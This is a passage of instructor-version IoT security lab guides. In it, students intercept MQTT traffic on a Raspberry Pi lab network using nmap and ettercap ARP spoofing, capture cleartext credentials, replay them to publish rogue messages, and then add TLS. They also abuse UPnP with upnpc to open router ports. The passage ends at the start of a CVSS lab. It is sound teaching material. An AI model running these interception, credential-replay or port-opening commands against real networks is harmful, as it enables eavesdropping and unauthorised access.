1883 by default. When using MQTT over SSL, it uses the registered TCP/IP port 8883.
The MQTT protocol uses topics as a communication avenue. MQTT topics use a hierarchal structure, similar
to a file path. The structure is used for message filtering and routing. An MQTT client can subscribe to one
Lab - Hacking MQTT
topic or multiple topics using wildcards, # and +. MQTT does not allow publishing to topics using wildcards.
You can only publish to an individual topic. A published topic can be the output data from a sensor, for
example.
The MQTT broker is the server that handles communications between the publisher and subscriber. The
broker is responsible for receiving and filtering all messages and deciding which devices are interested in
which messages based on the message topic. The broker sends the messages to the clients that have
subscribed to the topic of the message.
In this lab, you will setup an MQTT infrastructure that includes a broker, publisher, and subscriber. You will
also publish MQTT messages and subscribe to MQTT topics. You will also secure MQTT communications
using username and password credentials and transport layer security (TLS). Finally, you will attack the
MQTT infrastructure by trying to intercept the MQTT communications between the clients and broker.
Instructor Note: This lab requires three Raspberry Pi devices that are configured in separate terminals
through PL-App. A fourth terminal is required to be open on the Kali VM. Managing the terminals and entering
the correct commands in the correct terminal may be a challenge for students.
The lab uses Mosquitto clients to create MQTT broker, subscriber, and publisher devices. It may be useful to
have the students become familiar with Mosquitto by visiting the website and looking at the documentation.
The lab also uses Ettercap, which is included in the Kali VM. Ettercap is a very interesting tool for creating
Man-in-the-Middle attacks. Various tutorials about Ettercap are available on the web.
Part 1: Setting up a Publishing/Subscriber MQTT Infrastructure

In this part of the lab, you will set up an MQTT broker server. You will also subscribe to and publish MQTT
messages.
Step 1: Set up your topology.

In this lab, you will need to create a local network that consists of 3 Raspberry Pi devices, a network switch,
and a PC running the IoTSec Kali VM.
a. Connect the network as shown in the topology diagram. Do not power up the Raspberry Pi devices yet.
b. Start the IoTSec Kali VM and start DHCP services using the
/root/lab_support_files/scripts/start_dhcp.sh script as was done in previous labs.
c. Power up the Raspberry Pi devices and use the PL-App to determine the IP addresses.
d. Enable and start the SSH service on the Raspberry Pi devices as necessary.
e. Access the three Raspberry Pi devices via SSH as a privileged user, such as pi, from the IoTSec Kali VM.
If possible, arrange the terminal windows so you can view all of them at the same time.
Step 2: Run a local broker server.

In this step, you will start the local broker server to create the MQTT environment. As an example, the
Raspberry Pi broker server is assigned an IP address of 203.0.113.11. The default user, pi, will be used as
the user throughout this lab.
a. From the Kali VM, go to the terminal of the Raspberry Pi that is to serve as the MQTT broker.
b. First, change the prompt of the broker Pi by entering the command export PS1="pl-app \u@broker:\w#
" This will make it easier to know which MQTT device you are working with.
pi@myPi_1:~ $ export PS1="\u@broker:\w$ "
pi@broker:~$
c. In the terminal for the device that will be the broker, add the non-root privileged user, such as pi, to the
group mosquito.
Lab - Hacking MQTT
pi@broker:~$ sudo adduser pi mosquitto

Adding user `pi' to group `mosquitto' ...
Adding user pi to group mosquitto
Done.
d. The log file for the Mosquitto server should have write permission for the file owner and any users in the
mosquitto group.
pi@broker:~$ sudo chmod 664 /var/log/mosquitto/mosquitto.log
In this case, chmod is supplied an octal value to specify the permissions. What does this octal value
mean?
____________________________________________________________________________________
____________________________________________________________________________________
The 6 specifies read and write privileges. The 4 specifies read only privileges. The current user and group
are provided with read and write privileges. Others have read only privileges.
e. Verify that the permissions have changed for moquitto.log.
pi@broker:~$ ls -l /var/log/mosquitto/mosquitto.log
-rw-rw-r-- 1 mosquitto mosquitto 41232 Jul 7 21:26 /var/log/mosquitto/mosquitto.log
f. Start the broker server on the broker Raspberry Pi using the command mosquitto.
pi@broker:~$ mosquitto -v
1530599037: mosquitto version 1.4.10 (build date Fri, 22 Dec 2017 08:19:25
+0000) starting
1530599037: Using default config.
1530599037: Opening ipv4 listen socket on port 1883.
1530599037: Opening ipv6 listen socket on port 1883.
g. Leave the broker server process running in the terminal.
Step 3: Subscribe to a topic and publish MQTT messages.

a. On the Kali VM, go to the terminal for the device that will be the subscriber.
b. Change the prompt by entering the command export PS1="\u@subscriber:\w$ ".
pi@myPi_2:~$ export PS1="\u@subscriber:\w$ "
pi@subscriber:~$
c. Start the subscriber client using the command mosquitto_sub. The command includes the topic. The
broker will send MQTT messages in the topic to the subscriber when messages are published to that
topic. Provide the IP address of the broker Pi to the command.
pi@subscriber:~$ mosquitto_sub -d -h 203.0.113.11 -t cisco/iots/user
Client mosqsub/783-subscriber sending CONNECT
Client mosqsub/783-subscriber received CONNACK
Client mosqsub/783-subscriber sending SUBSCRIBE (Mid: 1, Topic:
cisco/iots/user, QoS: 0)
Client mosqsub/783-subscriber received SUBACK
Subscribed (mid: 1): 0
d. Leave the subscriber client process running in the terminal.
Lab - Hacking MQTT
e. Go to the terminal for the device that will serve as the MQTT publisher. Change the prompt by entering
the command export PS1=" \u@publisher:\w$ ".
pi@myPi_3:~$ export PS1="\u@publisher:\w$ "
pi@publisher:~$
f. The publisher sends MQTT messages using the command mosquitto_pub. Messages are sent to the
broker. The broker distributes the message to the appropriate subscribers for the topic.
pi@publisher:~$ mosquitto_pub -d -h 203.0.113.11 -t cisco/iots/user -m "This
message has been sent over MQTT"
Client mosqpub/1593-publisher sending CONNECT
Client mosqpub/1593-publisher received CONNACK
Client mosqpub/1593-publisher sending PUBLISH (d0, q0, r0, m1,
'cisco/iots/user', ... (36 bytes))
Client mosqpub/1593-publisher sending DISCONNECT
Using the man pages or other resources, what is the topic for these MQTT messages?
____________________________________________________________________________________
cisco/iots/user
g. You should see the MQTT message appear in the subscriber terminal along with a number of MQTT
status messages.
Part 2: Sniffing Data using Kali

In this part of the lab, you will use the IoTSec Kali VM to run a Man-in-the-Middle (MITM) attack on the MQTT
network.
Step 1: MITM attack using Kali on TCP

a. The MQTT broker, publisher, and subscriber can be located using nmap from the IoTSec Kali VM. The broker
typically uses ports 1883 or 8883 if MQTT is using TLS. A hacker could use this reconnaissance method to
learn about the protocols and devices on the target network, focusing on port 1883 which is used by MQTT.
root@kali:~# nmap 203.0.113.0/24 -p 1883
< output omitted >
PORT STATE SERVICE

1883/tcp open mqtt
MAC Address: B8:27:EB:6D:BD:30 (Raspberry Pi Foundation)

PORT STATE SERVICE

1883/tcp closed mqtt
MAC Address: B8:27:EB:9F:1B:57 (Raspberry Pi Foundation)
Lab - Hacking MQTT

PORT STATE SERVICE

1883/tcp closed mqtt
MAC Address: B8:27:EB:E8:81:44 (Raspberry Pi Foundation)
< output omitted >
Nmap done: 256 IP addresses (6 hosts up) scanned in 2.26 seconds
b. After discovering the victim IP addresses, configure Kali to forward traffic between the destination and
source devices which are going to be attacked. This command will enable Kali to forward IP packets that
it will intercept on to the intended destination. In MITM attacks, the MITM device intercepts traffic from a
source and then forwards the traffic to the destination after capturing it. This makes the MITM device
transparent to users.
root@kali:~# sysctl -w net.ipv4.ip_forward=1
net.ipv4.ip_forward = 1
c. Run the following command to perform a MITM attack between the publisher and the broker server on the
local network. Ettercap is a tool that enables MITM attacks by allowing a device to use the MAC address
of a destination machine to intercept packets to that machine. The following command stores the
intercepted data in the dump.pcap file. If other traffic to the Kali VM is generated, that will also be saved
(e.g., SSH).
root@kali:~# ettercap -Tq -i eth0 -M arp:remote //203.0.113.11/
//203.0.113.13/ -w dump.pcap
d. Press the spacebar to view the captured packets in real time.
e. Publish another MQTT message.
pi@publisher:~ $ mosquitto_pub -d -h 203.0.113.11 -t cisco/iots/user -m "This
message has been sent over MQTT again."
f. To quit Ettercap, press q to stop the capture when the subscriber has received the message.
Step 2: View the capture using Wireshark.

a. Open the file dump.pcap using Wireshark.
root@kali:~# wireshark dump.pcap &
b. Apply a display filter so only MQTT-related traffic is shown. Enter mqtt in the display filter field and press
Enter.
c. In Wireshark, expand the packet that is labelled "Publish Message" in the Info column. You should see
that although the Kali VM is not part of the MQTT network it has intercepted the message. Note also that
the MQTT subscriber also received the message as expected. The Kali VM is acting as a man in the
Lab - Hacking MQTT
middle and is able to read and save messages that are not intended for it. The Kali VM then forwards the
messages on to the intended recipient, as you will see in the terminal for the subscriber Pi.
Step 3: Publish rogue data.

In the capture, you can see the broker server data, IP address, and port number. In this step, you will publish
rogue data from the IoTSec Kali VM to the MQTT network.
a. Verify that the subscriber is still listening for MQTT messages. If not, use the command to subscribe to
the messages again.
pi@subscriber:~ $ mosquitto_sub -d -h 203.0.113.11 -t cisco/iots/user
b. Publish a rogue message from Kali to the MQTT broker.
root@kali:~# mosquitto_pub -d -h 203.0.113.11 -t cisco/iots/user -m "This is
a rogue message from KALI!"
What message did the MQTT subscriber receive?
____________________________________________________________________________________
This is a rogue message from KALI!
c. Stop the MQTT service on the broker and subscriber by pressing Ctrl+C.
d. Imagine an industrial IoT system in which sensors send data over MQTT from manufacturing equipment.
The sensors act as publishers of data to an MQTT broker. The broker sends the data to subscriber
actuator devices that control safety systems based on the sensor data values that are received. How
could a hacker perform an attack against this network and what could the hacker accomplish?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Lab - Hacking MQTT
Answers will vary. If the hacker were able to connect a computer to the network, the hacker could use
Wireshark to determine that MQTT was in use, the IP address of the broker, and the topics that are being
published. The hacker could then publish rogue data that could activate a safety system, perhaps turning
on fire suppression systems or shutting down equipment.
Part 3: Adding Username/Password Authentication

MQTT can use usernames and passwords to authenticate connections.
Step 1: Add a simple username / password authentication mechanism.

a. On the broker Pi, create a local database file that stores the username and passwords. Create a file
named passwords with a single line that contains the following syntax: username:password.
pi@broker:~ $ echo user:myPassword > passwords
b. Verify the content of the file passwords by using any command that can view the content of a text file,
such as cat or more.
pi@broker:~ $ cat passwords
user:myPassword
c. The mosquitto broker requires the passwords in a hash format, so you need to convert the file
passwords using the command mosquitto_passwd.
pi@broker:~ $ mosquitto_passwd -U passwords
pi@broker:~ $ cat passwords
user:$6$BnGSNi8dPHdVraBR$l0TGhVgT54KKb3NoxKmWgq+wdMJLOc7NnCUqSFJj0/Hun3CkmGPH
pbQwM+2GqzVUTSRqWX95jnqaJhFZGAXxTw==
d. Copy the mosquitto configuration file named mosquitto_simple_pass.conf from the scripts folder to your
current working directory. Be sure to include the "." after the filename in the command.
pi@broker:~ $ cp /home/pi/notebooks/Course\ Materials/4.\ IoT\
Security/scripts/mosquitto_simple_pass.conf .
e. Run the broker using the configuration file.
pi@broker:~ $ mosquitto -v -c mosquitto_simple_pass.conf
Note: If you received a message “Error: Unable to open log file /var/log/mosquitto/mosquitto.log for
writing.”, you will need to reboot the Pi to release the port that is used by MQTT.
pi@broker:~ $ sudo reboot
f. To test the configuration, try to publish something without the username/password on the publisher client.
pi@publisher:~ $ mosquitto_pub -d -h 203.0.113.11 -t cisco/iots/user -m "This
message has been sent over MQTT without authentication."
Client mosqpub/15647-raspberry sending CONNECT
Client mosqpub/15647-raspberry received CONNACK
Connection Refused: not authorised.
Error: The connection was refused.
g. Adding authentication during MQTT message exchange requires extra parameters as shown below. If
you are still subscribed, stop subscribing by pressing Ctrl-C. Restart the subscriber and then start
publishing messages with your configured username and password. After publishing, confirm that the
message was received by the subscriber.
Lab - Hacking MQTT
For the subscriber:

pi@subscriber:~ $ mosquitto_sub -d -h 203.0.113.11 -u user -P myPassword -t
cisco/iots/user
Client mosqsub/13868-subscribe sending CONNECT
Client mosqsub/13868-subscribe received CONNACK
Client mosqsub/13868-subscribe sending SUBSCRIBE (Mid: 1, Topic:
Client mosqsub/13868-subscribe received SUBACK
For the publisher:
pi@publisher:~ $ mosquitto_pub -d -h 203.0.113.11 -u user -P myPassword -t
cisco/iots/user -m "This message has been sent over MQTT using
authtentication."
Client mosqpub/14203-publisher sending CONNECT
Client mosqpub/14203-publisher received CONNACK
Client mosqpub/14203-publisher sending PUBLISH (d0, q0, r0, m1,
Client mosqpub/14203-publisher sending DISCONNECT
Step 2: Replay attack and publish rogue data.

a. Verify that you are still subscribed to the topic. If not, enter the following command.
cisco/iots/user
b. Start the packet capture on IoTSec Kali VM to accomplish an MITM attack and to capture the username
and password in the traffic between the broker and publisher.
//203.0.113.13/ -w dump_simple.pcap
c. Go to the terminal on the publisher and issue the following command to send an MQTT message.
cisco/iots/user -m "This message is sent by the publisher using
username/password."
Verify that the message has been received by the subscriber. Return to Kali and exit Ettercap by pressing
q.
d. Open the dump_simple.pcap file in Wireshark as was done previously. Filter for MQTT traffic. Open the
Connect Command packet and expand the MQTT data. What vulnerability is exposed here?
____________________________________________________________________________________
The username and password are transmitted in clear text.
e. Now the attacker can assume the role of the publisher and can send MQTT messages with the
intercepted username and password. In another terminal on Kali, enter the command below to send
message from the MITM device to the broker.
root@kali:~# mosquitto_pub -d -h 203.0.113.11 -u user -P myPassword -t
cisco/iots/user -m "This message is sent by Kali using username/password."
Client mosqpub|1817-kali sending CONNECT
Client mosqpub|1817-kali received CONNACK
Lab - Hacking MQTT
Client mosqpub|1817-kali sending PUBLISH (d0, q0, r0, m1, 'cisco/iots/user',

... (53 bytes))
Client mosqpub|1817-kali sending DISCONNECT
What message did the subscriber see?
____________________________________________________________________________________
____________________________________________________________________________________
This message is sent by Kali using username/password.
f. Use Ctrl+C in the broker and subscriber terminals to terminate the mosquito processes.
Part 4: Adding TLS Protection
Step 1: Add a TLS layer for data transport.

For a TLS connection to be established, it requires a certificate on the broker that can be authenticated on the
subscriber and publisher. Note that generating certificates and using TLS on a constrained device might
require a large amount of time. The steps for creating the certificates can be found in the Mosquitto
documentation.
pi@broker:~ $ man mosquitto-tls
a. Execute the following command to create the required certificates. Note that we are using a self-signed
Certificate Authority and server-side certificates. You can use the script provided by Mosquitto to
generate both the CA and server certificates and key.
On the broker, navigate to your home directory. Copy the CA script from the scripts folder to your home
directory.
Security/scripts/generate-CA.sh .
b. Change the permission of the script so it can be executed. Run the script.
pi@broker:~ $ chmod u+x generate-CA.sh
pi@broker:~ $ ./generate-CA.sh
Generating a 2048 bit RSA private key
........+++
......................+++
writing new private key to './ca.key'
-----
Created CA certificate in ./ca.crt
<output omitted>
c. Now you should have a server certificate and a CA certificate. For the subscriber and publisher to
connections using the previously created certificates, the CA certificate must also be copied to the
subscriber and publisher. You can copy the certificate securely from the broker to the clients using the
command scp.
pi@broker:~ $ scp ca.crt pi@203.0.113.13:/home/pi
pi@203.0.113.13's password:
ca.crt 100% 1330 934.4KB/s 00:00
d. Repeat the secure file copy for the other client.
pi@broker:~ $ scp ca.crt pi@203.0.113.12:/home/pi
Lab - Hacking MQTT
e. Copy the mosquitto configuration file named mosquitto_tls.conf from the scripts folder to the current
working directory.
Security/scripts/mosquitto_tls.conf .
Step 2: MITM attack using Kali

a. Start the broker service using the TLS configuration file.
pi@broker:~ $ mosquitto -v -c mosquitto_tls.conf
b. Use the following commands to test sending messages via TLS. Open the subscriber.
cisco/iots/user --cafile ca.crt
Client mosqsub/16213-raspberry sending CONNECT
Client mosqsub/16213-raspberry received CONNACK
Client mosqsub/16213-raspberry sending SUBSCRIBE (Mid: 1, Topic:
Client mosqsub/16213-raspberry received SUBACK
c. Launch the publisher to deliver the required message.
cisco/iots/user -m "This message has been sent over MQTT and TLS." --cafile
ca.crt
Client mosqpub/16451-raspberry sending CONNECT
Client mosqpub/16451-raspberry received CONNACK
Client mosqpub/16451-raspberry sending PUBLISH (d0, q0, r0, m1,
Client mosqpub/16451-raspberry sending DISCONNECT
On the subscriber, the message should arrive shortly.
Client mosqsub/16216-raspberry received PUBLISH (d0, q0, r0, m0,
This message has been sent over MQTT and TLS
d. Now, execute a MITM attack as previously and save the captured data.
//203.0.113.13/ -w dump_tls.pcap
e. Launch the publisher to deliver the message.
pi@publisher:~ # mosquitto_pub -d -h 203.0.113.11 -u user -P myPassword -t
cisco/iots/user -m "This message has been sent over MQTT and TLS again." --
cafile ca.crt
Step 3: Review the encrypted data using Wireshark.

Open the pcap file created previously and look at the transmitted MQTT messages. Wireshark cannot decode
the MQTT messages as they are protected by the TLS layer and show malformed packets.
Can you use only TLS without requiring a username and password?
_______________________________________________________________________________________
_______________________________________________________________________________________
Lab - Hacking MQTT
No, because simple TLS provides only server-side authentication, not client.
Part 5: Clean Up
You will remove the files that were created in the lab and return the user settings to the state before this lab,
unless instructed otherwise by your instructor.
a. In the Kali VM, remove all the pcap files from the root user’s home directory.
root@kali:~# rm *.pcap
b. Use Ctrl+C in the broker and subscriber terminals to terminate the MQTT processes.
c. For the publisher and the subscriber, remove the TLS certificates.
pi@publisher:~$ rm ca.crt
rm: remove write-protected regular file 'ca.crt'? yes
d. For the broker, remove all the certificates and mosquito configuration files in the pi user’s home directory.
pi@broker:~$ rm ca.* *.conf localhost.* *.sh passwords
rm: remove write-protected regular file 'ca.crt'? yes
rm: remove write-protected regular file 'ca.key'? yes
rm: remove write-protected regular file 'localhost.crt'? yes
rm: remove write-protected regular file 'localhost.key'? yes
e. For the broker, restore the file permission for the mosquito.log file.
pi@broker:~$ sudo chmod 644 /var/log/mosquitto/mosquitto.log
f. For the broker, remove the user pi from the mosquito group.
pi@broker:~$ sudo deluser pi mosquitto
sudo deluser pi mosquitto
Removing user `pi' from group `mosquitto' ...
Done.
Lab – UPnP Vulnerabilities (Instructor Version)
Instructor Note: Red font color and completed code cells indicate that the information appears in the instructor
copy only.
Lab Topology
Connectivity requirements. As shown in the topology, the Raspberry Pi will be configured as wireless client and
a wired router, requiring a second network connection. The Raspberry Pi and the PL-App/Kali host can be directly
connected. The switch is included in the topology to indicate that the Raspberry Pi could act as a gateway to an
entire network of hosts in its role as router between the internal and external networks.
Addressing
The Pi will acquire an address from the external network, while providing addresses to the internal network.
Objectives
Part 1: Configuring the Raspberry Pi as a wired router using a BASH script
Part 2: Connecting a Client to the Raspberry Pi
Part 3: Testing Ports using UPnP
Many home routers are Linux-based. To ease connectivity challenges, they offer services such as DHCP,
NAT, UPnP, and more. They also offer both wired and wireless connections to the local network while
protecting users from threats from the Internet. Unfortunately, these routers can be tricked to open various
ports that will permit access to the internal network by threat actors from the Internet.
In this lab, you will turn a Raspberry Pi into a working router. Unlike most routers, the Raspberry Pi will
connect to the network wirelessly using PL-App, and route wireless traffic into a local wired Ethernet network.
A client will be added and connectivity will be tested. The client will then use Universal Plug and Play (UPnP)
to open a communication port through the router without authentication.
Lab - UPnP Vulnerabilities
Required Resources
• PC or laptop
• IoTSec Kali VM
• 8 GB Micro SD card (minimum required) with PL-App installed
• Raspberry Pi 3, Model B or later
• A wireless network connection
• Ethernet cables
• A switch
Predictable network interface names containing MAC addresses are becoming increasingly common.
Because they may break the script used in this lab, raspi-config may be used to transition back to traditional
interface names (eth0, eth1, wlan0, etc.). To learn more, read the following:
https://www.freedesktop.org/wiki/Software/systemd/PredictableNetworkInterfaceNames/
Part 1: Configuring the Raspberry Pi as a wired router using a BASH script
Step 1: Configure the PL-App image to connect to your WiFi network.

a. Connect the devices as shown in the topology diagram.
b. Start the DHCP services on the IoTSec Kali VM as necessary.
c. Determine the IP address of the Raspberry Pi device.
d. Open a web browser in IoTSec Kali VM and navigate to the IP address of your Raspberry Pi device.
e. In the upper right-hand corner, click the Config icon (looks like a gear).
f. Enter the information for the SSID and password of your wireless network. Click OK to continue. Click
Yes when prompted to continue making changes to config. The SSID and password may be provided by
your instructor.
g. Open a terminal from the PL-App. Enter ifconfig to verify that the Raspberry Pi device is connected to the
WiFi network.
(pl-app) root@myPi:/home/pi/notebooks# ifconfig
<output omitted>
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.11.201 netmask 255.255.255.0 broadcast 192.168.11.255
inet6 fe80::7859:df95:f2de:59f2 prefixlen 64 scopeid 0x20<link>
ether b8:27:eb:38:e8:65 txqueuelen 1000 (Ethernet)
RX packets 71 bytes 6193 (6.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 383 bytes 42370 (41.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Step 2: Run the BASH script

In this step, you will run a BASH script that prepares your Raspberry Pi to act as a router between the wired
and wireless networks.
a. Navigate to the scripts directory.
(pl-app) root@myPi:/home/pi/notebooks# cd /home/pi/notebooks/Course\
Materials/4.\ IoT\ Security/scripts/
If desired, you can use the command PROMPT_DIRTRIM=1 to make the prompt shorter for the current
terminal.
(pl-app) root@myPi:/home/pi/notebooks/Course Materials/4. IoT
Security/scripts # PROMPT_DIRTRIM=1
b. Use ls -l to view the attributes of the script file. If it is not executable, use chmod +x to change the
attributes of the file.
(pl-app) root@myPi:.../scripts# chmod +x WiFiPi.sh
c. Run the BASH script by invoking its name from the current folder.
(pl-app) root@myPi:.../scripts# ./WiFiPi.sh
d. Follow the directions and your instructor’s guidance to turn the Raspberry Pi into a wired or wireless
router.
e. Wait for the Pi to reboot. You will lose network connectivity to your Raspberry Pi device.
Part 2: Connecting a Client to the Raspberry Pi

In this part of the lab, you will configure the Raspberry Pi to work as a router between the wired internal
network and the wireless external network.
a. Open a web browser in IoTSec Kali VM and navigate to the Pi at 203.0.113.254. Log in to PL-App.
b. Open a new terminal on the Pi and issue the ifconfig command. You should see the following:
(pl-app) root@myPi:/home/pi/notebooks# ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether b8:27:eb:61:08:42 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
TX packets 0 bytes 0 (0.0 B)
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::f377:c15:ba37:bb1 prefixlen 64 scopeid 0x20<link>
ether b8:27:eb:34:5d:17 txqueuelen 1000 (Ethernet)
RX packets 2040 bytes 397045 (387.7 KiB)
TX packets 1815 bytes 1632892 (1.5 MiB)
Note: The address displayed above, 192.168.11.201/24, will vary depending on the configuration of your WiFi
network.
Part 3: Testing Ports using UPnP
Step 1: Start the Linux Internet Gateway Device (IGD) service.

a. In the PL-App terminal that is open in the Kali VM browser, view the status of the Linux IGD service.
(pl-app) root@myPi:/home/pi/notebooks# systemctl status linux-igd
linux-igd.service - LSB: UPnP Internet Gateway Device
Loaded: loaded (/etc/init.d/linux-igd; disabled; vendor preset: enabled)
Active: inactive (dead)
Docs: man:systemd-sysv-generator(8)
b. If the Linux IDG service is not running, as shown in the output above, start the service.
(pl-app) root@myPi:/home/pi/notebooks# systemctl start linux-igd
c. If necessary, confirm the status of the Linux IDG service.
● linux-igd.service - LSB: UPnP Internet Gateway Device
Loaded: loaded (/etc/init.d/linux-igd; disabled; vendor preset: enabled)
Active: active (running) since Thu 2018-05-24 23:52:31 UTC; 7s ago
Docs: man:systemd-sysv-generator(8)
Process: 1059 ExecStart=/etc/init.d/linux-igd start (code=exited,
status=0/SUCCESS)
CGroup: /system.slice/linux-igd.service
└─1067 /usr/sbin/upnpd wlan0 eth0
May 24 23:52:31 pi systemd[1]: Starting LSB: UPnP Internet Gateway Device...

May 24 23:52:31 pi linux-igd[1059]: Starting Linux IGD Daemon: linux-igd.
May 24 23:52:31 pi systemd[1]: Started LSB: UPnP Internet Gateway Device.
May 24 23:52:31 pi upnpd[1067]: 0x76fd54b0 UPnP SDK Successfully Initialized.
May 24 23:52:31 pi upnpd[1067]: 0x76fd54b0 Successfully set the Web Server
Root Directory.
May 24 23:52:31 pi upnpd[1067]: 0x76fd54b0 IGD root device successfully
registered.
May 24 23:52:31 pi upnpd[1067]: 0x76fd54b0 Advertisements Sent. Listening for
requests ...
Step 2: Verify open ports and create a new mapping using Linux.
A router should isolate the Internet from the LAN behind it. Ideally devices on the Internet would not be able to
open connections to devices in the LAN behind the router. UPnP allows an internal device to ask the router to
open a port in its firewall, allowing devices out on the Internet to reach the internal device. While there are a
few special cases where this is desirable, more often than not, allowing internal devices to use UPnP to open
ports is bad practice.
In this step, we will use the iptables Linux kernel firewall utility to observe the behavior of UPnP on the Pi.
a. Use the following commands on the Raspberry Pi to determine the open ports and view the routing
tables. Document the number of open ports.
(pl-app) root@myPi:/home/pi/notebooks# iptables -S
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-A FORWARD -i wlan0 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -i eth0 -o wlan0 -j ACCEPT
b. Use the netstat -tuna command to list the services (and theirs ports) running on the Pi.
(pl-app) root@myPi:/home/pi/notebooks# netstat -tuna
Is there a service running on port 49152? What service often listens to that port? Perform a Google
search and record your answer below.
____________________________________________________________________________________
____________________________________________________________________________________
Yes, a service is running on port 49152. Research on the Internet shows that Linux IGD uses port 49152
to run UPnP. In addition, research shows that the only standard port for UPnP is UPD port 1900. It is also
open on the Pi.
c. Before upnpc in the Kali VM can communicate with the Raspberry Pi, you must create a default route
pointing to the Pi. In the Kali VM, enter the following command:
root@kali:~# ip route add default via 203.0.113.254
Instructor Note: This default route should NOT be necessary as the Pi and Kali belong to the same
network. However, because of an upnpc implementation decision, communication cannot be established
without a default route.
d. In a terminal on IoTSec Kali VM, you will use upnpc to simulate an internal UPnP-ready device.
Upnpc is an UPnP client. Use the upnpc command to create a port mapping on the Raspberry Pi router.
In this case, the client’s IP is 203.0.113.1 (Kali’s IP). The command requests that the router expose the
client’s SSH port (port 22) to the Internet as port 1337, much as an IoT device would.
root@kali:~# upnpc -a 203.0.113.1 22 1337 tcp
upnpc : miniupnpc library test client, version 2.0.
(c) 2005-2017 Thomas Bernard.
Go to http://miniupnp.free.fr/ or https://miniupnp.tuxfamily.org/
for more information.
List of UPNP devices found on the network :
desc: http://203.0.113.254:49152/gatedesc.xml
st: urn:schemas-upnp-org:device:InternetGatewayDevice:1
Found a (not connected?) IGD : http://203.0.113.254:49152/upnp/control/WANIPConn1

Trying to continue anyway
Local LAN ip address : 203.0.113.1
ExternalIPAddress = 192.168.11.201
InternalIP:Port = 203.0.113.1:22
external 192.168.11.201:1337 TCP is redirected to internal 203.0.113.1:22 (duration=0)
e. Return to the terminal that is open on the Raspberry Pi in PL-App. Note the change in the IP tables and
ports of the Raspberry Pi router by repeating the commands from step a.
(pl-app) root@myPi:/home/pi/notebooks# iptables -S
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT

-A FORWARD -d 203.0.113.1/32 -p tcp -m tcp --dport 22 -j ACCEPT
-A FORWARD -i wlan0 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -i eth0 -o wlan0 -j ACCEPT
The UPnP service on the Kali VM has opened a port in the firewall of the Raspberry Pi gateway device.
The new port mapping will now allow an attacker to communicate with a listening IoT device inside of a
network. An IoT device could do much the same by using UPnP to open a port so that an Internet
application could communicate with the device. A user may not be aware that the router firewall has been
reconfigured in this way.
f. You can also use Miranda, a Kali tool, to discover, query, and interact with UPnP-enabled devices.
For more information about Miranda, navigate to https://tools.kali.org/information-gathering/miranda.
g. In a terminal on IoTSec Kali VM, enter miranda.
root@kali:~# miranda
h. At the upnp> prompt, enter msearch to discover UPnP-enabled devices on the network. Press Ctl+C to
stop the search.
What is the IP address of UPnP device? What version UPnP is used by the UPnP-enabled device?
____________________________________________________________________________________
The IP address of the UPnP device is 203.0.113.254 as configured in the WiFiPi script. At this time, it is
using UPnP version 1.0.
i. To find out more information about the UPnP device, enter host list at the prompt.
upnp> host list
[0] 203.0.113.254:49152
j. Using the ID provided by the list in [ ], enter host get 0 to request more information in this example. Then
enter host summary 0 to display the results.
upnp> host get 0
Requesting device and service info for 203.0.113.254:49152 (this could take a
few seconds)...
Failed to retrieve actions from service actions list for service urn:schemas-
dummy-com:service:Dummy:1!
Host data enumeration complete!
upnp> host summary 0
Host: 203.0.113.254:49152
XML File: http://203.0.113.254:49152/gatedesc.xml
<output omitted>
k. Type exit to leave miranda.
Step 3: Restore to the default configurations.

a. Remove the additional default route from IoTSec Kali VM.
root@kali:~# ip route del default via 203.0.113.254
b. In the PL-App terminal, navigate to the scripts directory if necessary.
(pl-app) root@myPi:/home/pi/notebooks# cd Course\ Materials/4.\ IoT\
Security/scripts/
c. Use chmod +x to add execute attribute to the cleanup file.
(pl-app) root@myPi:.../scripts# chmod +x Cleanup_WiFiPi.sh
d. Run the BASH script by invoking its name from the current folder.
(pl-app) root@myPi:.../scripts# ./CleanUp_WiFiPi.sh
e. The Raspberry Pi device will receive an IP address from the DHCP server that is running on IoTSec Kali
VM. Determine the assigned IP address.
Using a web browser on IoTSec Kali VM. Navigate to the Raspberry Pi. Verify that the dnsmasq, linux-igd
and WiFiPi services are stopped.
(pl-app) root@myPi:/home/pi/notebooks# systemctl status dnsmasq
(pl-app) root@myPi:/home/pi/notebooks# systemctl status WiFiPi
Note: Make sure students disable the services after they finish the lab. Dnsmasq and linux-igd could create
problems in other labs if left running.
Note: If students were unable to access the Raspberry Pi after reboot, the microSD card may need to be
reimaged. The Raspberry Pi can still be accessed directly via HDMI; however, network access will need to be
configured and the original /etc/dnsmasq.conf, /etc/network/interfaces and /etc/dhcpcd.config can be copied
from another Raspberry Pi device and replace the affected files.
Reflection
1. What is UPnP commonly used for in home networks?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
UPnP simplifies the setup of many home network devices such as printers, media servers, IoT devices and
digital assistants.
2. Consider your home network connection. Is UPnP running? What can be done to turn this service off?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary because students' home networks differ.
3. How can an attacker using a vulnerable IoT device take advantage of a UPnP-enabled router?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary. The key here is that attackers can use compromised IoT devices as UPnP clients and
expose internal devices to the Internet.
Lab - Using the CVSS (Instructor Version)
Objectives
In this lab, you will explain the concepts behind a strong password.
Part 1: Researching the Details of the CVSS Metrics Used to Compute the CVSS Score
Part 2: Using the CVSS Calculator to Determine the Severity Level of a Vulnerability
Part 3: Reflecting on the Use and Results of the CVSS Calculator
CVSS refers to the Common Vulnerability Scoring System. It is a vendor-neutral, industry standard that offers
an open framework for conveying the severity of vulnerabilities. It helps to determine the urgency and priority
of responses to vulnerabilities. The CVSS model is designed to provide users with an overall composite score
